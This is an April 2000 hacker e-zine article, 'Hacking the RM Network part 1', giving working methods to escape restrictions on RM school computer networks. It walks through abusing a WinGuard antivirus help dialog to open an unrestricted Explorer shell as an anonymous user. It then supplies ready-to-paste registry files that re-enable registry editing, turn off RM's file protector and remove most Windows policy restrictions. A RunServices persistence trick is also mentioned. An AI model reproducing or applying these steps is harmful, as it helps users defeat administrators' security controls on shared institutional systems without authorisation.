   _________ SWAT MAGAZINE ISSUE TWENTY EIGHT APRIL 2000 __________
  /         \___________________________________________/          \
 /                   Hacking the RM Network part 1                  \
/                         -: by nEthOoD :-                           \
-----------------------------------------------------------------------

Ok here is article number two comin' your way, i've decided to do the
RM Network even though it was done before by syZtem Krash (how can i
say it ............it was erm LAME!!!!!!!!!!!). These all work i've
used them unlike syZtem Krash who probably hasn't touched the RM
Network (by the way it was issue 21 the article waz in)

Well anyway here's some exploits and hacks for the RM Network

The Winguard Trick

Most RM Networks use Dr. Solomon's Winguard Virus Protection. To
determine whether the network you are using has WinGuard, you should
look in the System Tray for a little picture of a guard, to make sure
this is Winguard, double-click on it and it should somewhere say "Dr.
Solomon's WinGuard". Now leave this little window open and log-off,
now you should be at the RM Connect Screen. Use Alt + Tab to get to
WinGuard. Now go to Help -> Contents -> Open, and goto C:\Windows and
type in *.*, this will display all of the Files in Windows, now move
along to explorer.exe and right-click on it, and choose Open. Windows
Explorer shall now pop up with a unrestricted Shell. Also you will be
an anonymous User, if you click on Network on the RM Logoff Screen
the Username will be blank. You may wonder why when you open other
applications in the background and log-off they have disappeared,
This is because Dr. Solomon's Winguard is unkillable, so that the
protection is maximum, obviously it isn't just Explorer you can open,
so take a look around for any other interesting stuff. One thing
though, The RM Connect Box will still be there, and you can't close
it, maybe using WinKill might do the trick, but I'm really not sure.
If your RM Netwrk doesn't have Winguard, or they have used the patch
which was released a while ago for this flaw then turn off file
protector and add Notepad to the RunServices registry entry and use
that to access the HDD.

Now u have the anonymous login and access to the registry files -
(c:\windows\regedit.exe) i'll give u some things to do that will
make your life a hell of alot easier



This is exactly how RM Protect and Unprotect the Registry, here are
the files, the first one Protects, and the second one Unprotects.

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000001

REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

Once you have unprotected The registry, take a good look around, and
you'll find some interesting RM Only DWORD Values, etc. In this manual
I will refer back to using the registry quite a lot for different
things, so make sure you master registry editing and using the protect
and unprotect registry files.

Now the stuff you need to cut and paste to take most of the
restrictions off and to unprotect, BTW to turn on all this stuf
just change the value of dword:00000000 to dword:00000001

REGEDIT4

[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]
"loadvxd"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDrives"=dword:00000000
"LinkResolveIgnoreLinkInfo"=dword:00000000
"NoFolderOptions"=dword:00000000
"ClearRecentDocsOnExit"=dword:00000000
"NoTrayContextMenu"=dword:00000000
"EnforceShellExtensionSecurity"=dword:00000000
"NoPrinterTabs"=dword:00000000
"NoDeletePrinter"=dword:00000000
"NoAddPrinter"=dword:00000000
"NoRun"=dword:00000000
"NoSetFolders"=dword:00000000
"NoSetTaskbar"=dword:00000000
"NoClose"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000
"NoDispScrSavPage"=dword:00000000
"NoDispAppearancePage"=dword:00000000
"NoDispSettingsPage"=dword:00000000
"NoAdminPage"=dword:00000000
"NoProfilePage"=dword:00000000
"NoDevMgrPage"=dword:00000000
"NoConfigPage"=dword:0000000
"NoFileSysPage"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]
"NoFileSharingControl"=dword:00000000
"NoPrintSharingControl"=dword:00000000
"NoNetSetup"=dword:00000000
"NoNetSetupIDPage"=dword:00000000
"NoNetSetupSecurityPage"=dword:00000000
"NoEntireNetwork"=dword:00000000
"NoWorkgroupContents"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"NoRealMode"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]
"NoHTMLWallPaper"=dword:00000000
"NoChangingWallPaper"=dword:00000000
"NoCloseDragDropBands"=dword:00000000
"NoMovingBands"=dword:00000000

Ok to keep the reg kept after bootup, but before you discover this
for yourself you can't keep the user settings (as in a desktop you
created and sharing of the machines HD), but you can keep the
settings as in the settings that would allow you to keep RM file
protector off.



Anyway this is all for this article if there is part 2 in this issue
read it if not it may be in the next issue (if F_S puts it in).
Anyway have fun and i wish u many good hacks


                          -:nEThOoD:-
                        of ANtI magazine
                 http://www.geocities.com/antimag